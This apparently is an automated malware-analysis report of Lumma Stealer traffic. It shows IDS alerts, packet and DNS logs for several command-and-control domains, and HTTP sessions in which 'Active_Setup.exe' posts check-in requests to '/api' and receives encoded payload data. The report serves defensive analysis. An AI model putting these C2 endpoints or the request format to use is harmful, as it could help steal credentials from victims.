2024-12-30T18:19:19.923859+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49737 | 188.114.97.3 | 443 | TCP
2024-12-30T18:19:20.992784+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49740 | 188.114.97.3 | 443 | TCP
2024-12-30T18:19:22.172959+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49740 | 188.114.97.3 | 443 | TCP
2024-12-30T18:19:23.166550+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49743 | 188.114.97.3 | 443 | TCP
2024-12-30T18:19:25.275090+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49744 | 188.114.97.3 | 443 | TCP
2024-12-30T18:19:25.778758+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49744 | 188.114.97.3 | 443 | TCP
2024-12-30T18:19:26.632901+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49745 | 185.161.251.21 | 443 | TCP
2024-12-30T18:19:27.076691+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49746 | 104.21.37.128 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                Dec 30, 2024 18:19:20.393292904 CET44349737188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:20.393397093 CET44349737188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:20.397874117 CET49737443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:20.398003101 CET49737443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:20.398029089 CET44349737188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:20.510051012 CET49740443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:20.510097980 CET44349740188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:20.510176897 CET49740443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:20.510477066 CET49740443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:20.510488987 CET44349740188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:20.992714882 CET44349740188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:20.992784023 CET49740443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:20.994051933 CET49740443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:20.994062901 CET44349740188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:20.994256973 CET44349740188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:21.003988981 CET49740443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:21.004086018 CET49740443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:21.004091978 CET44349740188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:22.172971010 CET44349740188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:22.173051119 CET44349740188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:22.173099041 CET49740443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:22.173260927 CET49740443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:22.173283100 CET44349740188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:22.704474926 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:22.704531908 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:22.704621077 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:22.704900980 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:22.704912901 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:23.166479111 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:23.166549921 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.168551922 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.168560028 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:23.169078112 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:23.193703890 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.194458961 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.194515944 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:23.194623947 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.194680929 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:23.194792032 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.194971085 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:23.195091963 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.195115089 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:23.195403099 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.195429087 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:23.195564032 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.195596933 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.195648909 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:23.195792913 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.195827961 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.195883989 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:23.196022987 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.196053982 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.196070910 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.203993082 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:23.204157114 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.204195976 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.204257965 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:23.204669952 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.204687119 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:23.210808992 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:24.803970098 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:24.804068089 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:24.804121971 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:24.804316998 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:24.804337025 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:24.813457966 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:24.813505888 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:24.813574076 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:24.813823938 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:24.813834906 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:25.274991989 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:25.275089979 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:25.276478052 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:25.276489019 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:25.276691914 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:25.312733889 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:25.312752008 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:25.312963009 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:25.778753042 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:25.778865099 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:25.779069901 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:25.779320955 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:25.779340982 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:25.779354095 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:25.779359102 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:25.889342070 CET49745443192.168.2.4185.161.251.21
                                                                                                                                                Dec 30, 2024 18:19:25.889388084 CET44349745185.161.251.21192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:25.889467001 CET49745443192.168.2.4185.161.251.21
                                                                                                                                                Dec 30, 2024 18:19:25.889802933 CET49745443192.168.2.4185.161.251.21
                                                                                                                                                Dec 30, 2024 18:19:25.889815092 CET44349745185.161.251.21192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:26.632827997 CET44349745185.161.251.21192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:26.632900953 CET49745443192.168.2.4185.161.251.21
                                                                                                                                                Dec 30, 2024 18:19:26.636962891 CET49745443192.168.2.4185.161.251.21
                                                                                                                                                Dec 30, 2024 18:19:26.636972904 CET44349745185.161.251.21192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:26.637183905 CET44349745185.161.251.21192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:26.638493061 CET49745443192.168.2.4185.161.251.21
                                                                                                                                                Dec 30, 2024 18:19:26.679333925 CET44349745185.161.251.21192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:26.904964924 CET44349745185.161.251.21192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:26.905035019 CET44349745185.161.251.21192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:26.905095100 CET49745443192.168.2.4185.161.251.21
                                                                                                                                                Dec 30, 2024 18:19:26.906605005 CET49745443192.168.2.4185.161.251.21
                                                                                                                                                Dec 30, 2024 18:19:26.906625986 CET44349745185.161.251.21192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:26.906637907 CET49745443192.168.2.4185.161.251.21
                                                                                                                                                Dec 30, 2024 18:19:26.906644106 CET44349745185.161.251.21192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:26.943183899 CET49746443192.168.2.4104.21.37.128
                                                                                                                                                Dec 30, 2024 18:19:26.943252087 CET44349746104.21.37.128192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:26.943346977 CET49746443192.168.2.4104.21.37.128
                                                                                                                                                Dec 30, 2024 18:19:26.943593979 CET49746443192.168.2.4104.21.37.128
                                                                                                                                                Dec 30, 2024 18:19:26.943627119 CET44349746104.21.37.128192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:27.076690912 CET49746443192.168.2.4104.21.37.128
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 30, 2024 18:19:11.092152119 CET | 63160 | 53 | 192.168.2.4 | 1.1.1.1
Dec 30, 2024 18:19:11.104726076 CET | 53 | 63160 | 1.1.1.1 | 192.168.2.4
Dec 30, 2024 18:19:25.781056881 CET | 61817 | 53 | 192.168.2.4 | 1.1.1.1
Dec 30, 2024 18:19:25.888334990 CET | 53 | 61817 | 1.1.1.1 | 192.168.2.4
Dec 30, 2024 18:19:26.928519011 CET | 50637 | 53 | 192.168.2.4 | 1.1.1.1
Dec 30, 2024 18:19:26.942470074 CET | 53 | 50637 | 1.1.1.1 | 192.168.2.4
Dec 30, 2024 18:19:28.127329111 CET | 57822 | 53 | 192.168.2.4 | 1.1.1.1
Dec 30, 2024 18:19:28.136518955 CET | 53 | 57822 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 30, 2024 18:19:11.092152119 CET | 192.168.2.4 | 1.1.1.1 | 0x396b | Standard query (0) | cryofficesj.click | A (IP address) | IN (0x0001) | false
Dec 30, 2024 18:19:25.781056881 CET | 192.168.2.4 | 1.1.1.1 | 0x4a74 | Standard query (0) | cegu.shop | A (IP address) | IN (0x0001) | false
Dec 30, 2024 18:19:26.928519011 CET | 192.168.2.4 | 1.1.1.1 | 0x65bf | Standard query (0) | klipvumisui.shop | A (IP address) | IN (0x0001) | false
Dec 30, 2024 18:19:28.127329111 CET | 192.168.2.4 | 1.1.1.1 | 0xd268 | Standard query (0) | dfgh.online | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 30, 2024 18:19:11.104726076 CET | 1.1.1.1 | 192.168.2.4 | 0x396b | No error (0) | cryofficesj.click |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 18:19:11.104726076 CET | 1.1.1.1 | 192.168.2.4 | 0x396b | No error (0) | cryofficesj.click |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 18:19:25.888334990 CET | 1.1.1.1 | 192.168.2.4 | 0x4a74 | No error (0) | cegu.shop |  | 185.161.251.21 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 18:19:26.942470074 CET | 1.1.1.1 | 192.168.2.4 | 0x65bf | No error (0) | klipvumisui.shop |  | 104.21.37.128 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 18:19:26.942470074 CET | 1.1.1.1 | 192.168.2.4 | 0x65bf | No error (0) | klipvumisui.shop |  | 172.67.208.58 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 18:19:28.136518955 CET | 1.1.1.1 | 192.168.2.4 | 0xd268 | Name error (3) | dfgh.online | none | none | A (IP address) | IN (0x0001) | false
• cryofficesj.click
• cegu.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 188.114.97.3 | 443 | 7532 | C:\Users\user\Desktop\Active_Setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 17:19:11 UTC | 264 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: cryofficesj.click
2024-12-30 17:19:11 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-30 17:19:12 UTC | 1135 | IN | HTTP/1.1 200 OK
Date: Mon, 30 Dec 2024 17:19:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=mfie4mrp7ap1cmm2budbdbut7p; expires=Fri, 25 Apr 2025 11:05:51 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YUp2UTDDfGXI1FgXEnTeWM3AQYuwZOfAqj%2B4G3A1x%2BtUs6m6m%2BQYx7obvkGjC1T9yafkIhTH%2Beb8fjr7AHkYOdJ%2BMicbsnj8Vkw%2BCrl0JaY9J08qgEOJyEwK8wQQQmqI2HK4ig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa3b1821e644261-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2281&min_rtt=2247&rtt_var=911&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=908&delivery_rate=1158270&cwnd=239&unsent_bytes=0&cid=8c7622a5d5726d24&ts=681&x=0"
                                                                                                                                                2024-12-30 17:19:12 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                Data Ascii: 2ok
                                                                                                                                                2024-12-30 17:19:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 188.114.97.3 | 443 | 7532 | C:\Users\user\Desktop\Active_Setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 17:19:12 UTC | 265 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 78
Host: cryofficesj.click
2024-12-30 17:19:12 UTC | 78 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37
Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--ZINA&j=637b55279021aab33278188cfa638397
2024-12-30 17:19:13 UTC | 1131 | IN | HTTP/1.1 200 OK
Date: Mon, 30 Dec 2024 17:19:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ajj0qms2e65sorg3933vfrp7ch; expires=Fri, 25 Apr 2025 11:05:52 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nCNO9TwKHHlxn1C%2FkLEGnSPgmHoaWJuZJWVPXVFdoLvRVlYhaLXzMFXL1hVZSr%2F78hgoBWMsu9jbrBzMtDNqtWB8j0j%2FFtBGv2EZIINg5Nt5fI0%2FZ4cGtxr0gl9AMiTPdE1CSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fa3b1893b4842aa-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2262&min_rtt=2254&rtt_var=862&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=979&delivery_rate=1256454&cwnd=201&unsent_bytes=0&cid=e4562df5842187e1&ts=497&x=0"
                                                                                                                                                2024-12-30 17:19:13 UTC238INData Raw: 63 35 32 0d 0a 44 74 69 4a 30 32 57 55 77 51 37 31 39 79 36 4b 50 4b 51 58 32 2b 76 53 55 39 63 6a 6b 50 53 50 69 65 4c 77 6a 57 63 4d 39 67 70 31 2b 76 2f 78 58 36 44 74 4c 49 61 53 44 4c 42 49 31 6d 4b 2b 78 2f 41 79 73 77 47 71 6b 75 37 6c 6b 5a 57 68 52 58 71 62 4b 44 53 2b 36 4c 38 57 38 65 30 73 6b 49 38 4d 73 47 66 66 4e 62 36 46 38 47 6e 31 52 76 71 57 37 75 57 41 6b 65 59 49 66 4a 70 70 5a 72 54 75 75 77 44 33 70 57 2b 5a 6d 6b 76 76 57 63 56 39 74 59 4b 2f 4f 37 6f 42 76 4e 62 71 38 38 44 4b 72 79 70 70 67 6d 74 44 75 66 71 34 52 2b 6e 74 64 64 65 53 51 4b 67 47 68 6e 61 2b 69 62 34 31 73 30 6a 34 6e 4f 66 74 67 5a 54 6e 46 32 57 51 59 6d 61 36 37 62 6f 4b 2f 72 46 69 6b 35 31 41 36 56 50 46 4e
                                                                                                                                                Data Ascii: c52DtiJ02WUwQ719y6KPKQX2+vSU9cjkPSPieLwjWcM9gp1+v/xX6DtLIaSDLBI1mK+x/AyswGqku7lkZWhRXqbKDS+6L8W8e0skI8MsGffNb6F8Gn1RvqW7uWAkeYIfJppZrTuuwD3pW+ZmkvvWcV9tYK/O7oBvNbq88DKryppgmtDufq4R+ntddeSQKgGhna+ib41s0j4nOftgZTnF2WQYma67boK/rFik51A6VPFN
                                                                                                                                                2024-12-30 17:19:13 UTC1369INData Raw: 66 66 4a 74 79 6e 31 47 62 4c 46 33 2b 69 52 67 2f 6f 49 66 70 49 6f 63 2f 54 79 38 51 44 36 34 7a 54 58 6e 55 44 6d 57 38 56 36 76 6f 69 77 49 37 70 42 38 5a 37 6c 37 34 71 64 34 41 70 67 6e 6d 39 6b 73 2b 79 2b 41 50 36 6c 59 35 54 56 41 71 68 5a 33 6a 58 68 79 5a 41 68 74 6b 4c 6d 6d 2f 79 72 6e 39 7a 32 52 57 6d 59 4b 44 54 36 37 62 38 47 2b 36 4e 2b 6e 35 35 48 37 55 7a 4e 66 4c 53 45 73 44 79 2f 54 76 47 57 36 75 47 4b 6e 65 55 42 59 35 6c 75 62 4c 71 72 2f 30 66 78 75 79 7a 50 31 57 2f 74 54 73 46 35 72 38 75 4b 63 61 6f 50 36 39 62 71 35 38 44 4b 72 77 31 72 6c 32 74 6e 74 65 69 35 44 4f 53 6a 66 70 47 59 53 66 70 59 77 33 75 7a 69 71 49 37 75 30 66 78 6e 2b 62 69 68 5a 58 72 52 53 44 55 62 33 54 36 73 2f 45 6d 2b 36 68 67 6e 59 4a 4d 71 45 47 49
                                                                                                                                                Data Ascii: ffJtyn1GbLF3+iRg/oIfpIoc/Ty8QD64zTXnUDmW8V6voiwI7pB8Z7l74qd4Apgnm9ks+y+AP6lY5TVAqhZ3jXhyZAhtkLmm/yrn9z2RWmYKDT67b8G+6N+n55H7UzNfLSEsDy/TvGW6uGKneUBY5lubLqr/0fxuyzP1W/tTsF5r8uKcaoP69bq58DKrw1rl2tntei5DOSjfpGYSfpYw3uziqI7u0fxn+bihZXrRSDUb3T6s/Em+6hgnYJMqEGI
                                                                                                                                                2024-12-30 17:19:13 UTC1369INData Raw: 49 39 76 30 66 39 6d 2b 47 72 7a 74 4c 6f 48 53 37 4d 4b 45 61 35 2f 37 49 4e 74 4a 5a 76 6d 5a 74 4c 2f 68 37 5a 4f 36 44 4a 74 7a 33 31 47 62 4b 62 37 4f 4f 47 67 4f 41 49 62 5a 70 6d 59 37 2f 6b 75 51 66 32 72 6d 6d 54 6e 6b 66 72 55 38 4a 6e 73 34 6d 34 4e 4c 52 4c 2b 4e 61 6a 71 34 65 4b 72 31 30 75 70 58 39 6e 2b 4e 36 79 43 66 69 6b 65 74 65 4b 41 76 45 65 77 58 6e 35 30 66 41 38 76 55 54 33 6d 65 7a 68 6a 70 66 6c 43 57 61 61 61 33 36 31 37 37 45 4c 2f 71 6c 68 6d 5a 46 45 34 56 58 4e 63 37 6d 49 75 6e 48 37 41 66 57 4f 72 62 50 41 70 75 67 4a 59 35 73 71 57 62 6e 6c 76 77 44 67 34 33 50 5a 6a 41 7a 76 55 6f 59 74 2b 59 57 35 4d 62 35 4c 39 70 62 71 35 6f 57 52 36 41 5a 6a 6b 32 4a 69 76 65 2b 39 44 76 75 6c 62 4a 43 52 53 66 70 62 7a 33 6d 31 79
                                                                                                                                                Data Ascii: I9v0f9m+GrztLoHS7MKEa5/7INtJZvmZtL/h7ZO6DJtz31GbKb7OOGgOAIbZpmY7/kuQf2rmmTnkfrU8Jns4m4NLRL+Najq4eKr10upX9n+N6yCfiketeKAvEewXn50fA8vUT3mezhjpflCWaaa36177EL/qlhmZFE4VXNc7mIunH7AfWOrbPApugJY5sqWbnlvwDg43PZjAzvUoYt+YW5Mb5L9pbq5oWR6AZjk2Jive+9DvulbJCRSfpbz3m1y
                                                                                                                                                2024-12-30 17:19:13 UTC185INData Raw: 42 37 64 6a 30 71 34 65 65 72 31 30 75 6e 57 46 2b 74 4f 57 34 43 76 43 72 61 35 6d 59 52 2b 35 56 77 58 4b 2f 68 4c 67 38 73 45 4c 7a 6b 75 66 35 67 35 6e 6c 43 47 54 55 4a 69 79 39 38 2f 46 66 74 6f 52 67 76 6f 56 58 2b 6b 69 47 61 76 65 51 38 44 61 35 41 61 72 57 37 75 53 4a 6e 65 63 4e 59 5a 74 73 59 72 7a 74 76 41 4c 35 71 58 36 66 6d 30 48 6a 55 63 31 6e 75 59 53 30 50 62 46 4a 2b 5a 79 74 70 63 43 56 39 30 55 32 31 46 31 68 74 65 75 79 45 62 61 38 49 6f 37 56 53 2b 51 65 6e 6a 57 31 68 37 41 2b 75 55 33 35 6e 75 7a 6e 6a 70 58 71 44 47 0d 0a
                                                                                                                                                Data Ascii: B7dj0q4eer10unWF+tOW4CvCra5mYR+5VwXK/hLg8sELzkuf5g5nlCGTUJiy98/FftoRgvoVX+kiGaveQ8Da5AarW7uSJnecNYZtsYrztvAL5qX6fm0HjUc1nuYS0PbFJ+ZytpcCV90U21F1hteuyEba8Io7VS+QenjW1h7A+uU35nuznjpXqDG
                                                                                                                                                2024-12-30 17:19:13 UTC1369INData Raw: 34 33 33 33 0d 0a 61 63 65 6d 32 2b 34 37 41 4a 2b 61 4a 6f 6b 70 42 49 37 31 72 41 65 76 6e 48 38 44 61 74 41 61 72 57 77 73 79 31 30 4d 34 2f 4c 6f 73 6d 64 66 72 73 76 55 65 75 34 32 43 55 6d 55 54 6e 57 4d 39 35 73 34 43 37 50 62 35 46 2f 70 2f 6f 37 59 47 58 36 67 52 71 6d 47 4a 71 75 65 69 2b 43 50 6d 72 4c 4e 6e 56 53 2f 41 65 6e 6a 57 63 6e 72 73 2f 73 77 48 74 32 50 53 72 68 35 36 76 58 53 36 59 59 57 71 38 37 72 30 47 38 4b 74 70 6e 35 46 4e 37 6c 6a 46 65 72 32 4d 73 54 36 78 54 66 79 63 37 4f 71 4d 6d 65 41 4f 61 39 51 6d 4c 4c 33 7a 38 56 2b 32 6b 6d 2b 42 67 6c 7a 6b 48 74 6b 37 6f 4d 6d 33 50 66 55 5a 73 70 66 2f 34 59 71 63 36 67 70 72 6c 32 64 72 74 2b 32 39 44 66 2b 72 61 70 69 63 58 75 74 53 79 48 4b 33 68 62 34 38 76 30 4c 2f 31 71 4f
                                                                                                                                                Data Ascii: 4333acem2+47AJ+aJokpBI71rAevnH8DatAarWwsy10M4/LosmdfrsvUeu42CUmUTnWM95s4C7Pb5F/p/o7YGX6gRqmGJquei+CPmrLNnVS/AenjWcnrs/swHt2PSrh56vXS6YYWq87r0G8Ktpn5FN7ljFer2MsT6xTfyc7OqMmeAOa9QmLL3z8V+2km+BglzkHtk7oMm3PfUZspf/4Yqc6gprl2drt+29Df+rapicXutSyHK3hb48v0L/1qO
                                                                                                                                                2024-12-30 17:19:13 UTC1369INData Raw: 41 4a 6c 6e 47 4e 6a 76 50 6d 39 43 65 53 6d 66 6f 58 56 41 71 68 5a 33 6a 58 68 79 59 59 32 70 56 48 78 31 4e 7a 39 67 34 54 6b 43 47 4c 55 64 79 4b 6a 71 37 59 4c 74 76 73 73 6b 5a 70 46 36 31 48 48 66 4c 57 45 74 54 69 77 51 50 53 53 35 2b 47 41 6c 4f 6b 45 61 35 35 72 62 62 44 69 74 67 2f 78 6f 48 37 58 32 77 7a 76 52 6f 59 74 2b 61 43 33 49 37 74 52 73 6f 6d 6a 38 73 43 56 34 30 55 32 31 47 78 6d 74 65 2b 32 43 2f 43 6d 61 70 71 55 51 2b 6c 65 79 58 47 79 67 4c 59 77 75 45 54 2f 6b 76 2f 68 69 35 33 6a 44 47 4b 5a 4b 43 4c 36 37 4b 6c 48 72 75 4e 64 6d 70 74 43 37 30 69 47 61 76 65 51 38 44 61 35 41 61 72 57 37 4f 65 50 6b 65 41 47 62 5a 56 69 66 71 6a 6e 75 41 2f 7a 72 32 65 5a 6b 31 37 75 55 63 39 32 75 6f 43 33 4f 62 6c 4c 38 5a 47 74 70 63 43 56
